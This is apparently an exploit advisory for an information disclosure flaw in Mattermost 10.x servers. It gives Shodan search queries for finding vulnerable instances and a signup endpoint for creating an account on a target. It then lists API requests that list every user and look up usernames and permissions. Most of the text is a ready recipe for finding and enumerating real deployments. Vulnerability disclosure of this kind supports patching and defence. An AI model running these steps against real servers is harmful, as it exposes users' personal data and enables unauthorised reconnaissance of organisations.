# Exploit Title: MatterMost information disclosure # Date: 9/26/2025 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: MatterMost (https://mattermost.com) # Version: 10.*<= # Tested on: Linux/Windows Step 1 : attacker with these shodan queries can find the target https://www.shodan.io/search?query=http.component%3A%22mattermost%22+%22X-Version-Id%3A+10.9.*%22 https://www.shodan.io/search?query=http.component%3A%22mattermost%22+%22X-Version-Id%3A+10.10.1%22 Step 2 : Attacker can signup with this endpoint For example : http://TARGET_IP:TARGET_PORT/signup_user_complete Step 3 : After create account attacker can use these api endpoints to find juice information https://TARGET_URL/api/v4/users/me --> Attacker Information https://TARGET_URL/api/v4/users?per_page=200&page=0 --> Find All users after authentication https://TARGET_URL/api/v4/users/username/TARGET_USERNAME --> Find username permission notice about per_page : per_page mean about list of users that show AND send the up requests as GET .